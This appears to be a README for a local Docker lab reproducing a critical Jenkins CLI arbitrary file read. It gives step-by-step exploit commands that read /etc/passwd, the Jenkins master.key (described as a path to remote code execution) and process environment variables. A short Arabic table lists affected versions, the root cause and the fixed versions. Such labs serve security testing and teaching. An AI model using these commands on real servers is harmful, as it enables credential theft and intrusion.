
# 1. Start lab
docker-compose up -d
# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar
# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd
# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key
# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ
راجع REPORT.md للحصول على التحليل الفني الكامل (بالفيتنامية).
| البند | القيمة |
|---|---|
| CVSS | 9.8 (حرجة) |
| المتأثر | Jenkins <= 2.441, LTS <= 2.426.2 |
| نسخة المختبر | jenkins/jenkins:2.426.2-lts |
| السبب الجذري | args4j expandAtFiles مفعّل في CLI من جانب الخادم |
| الإصلاح | قم بالترقية إلى Jenkins >= 2.442 / LTS >= 2.426.3 |
docker-compose down -v --remove-orphans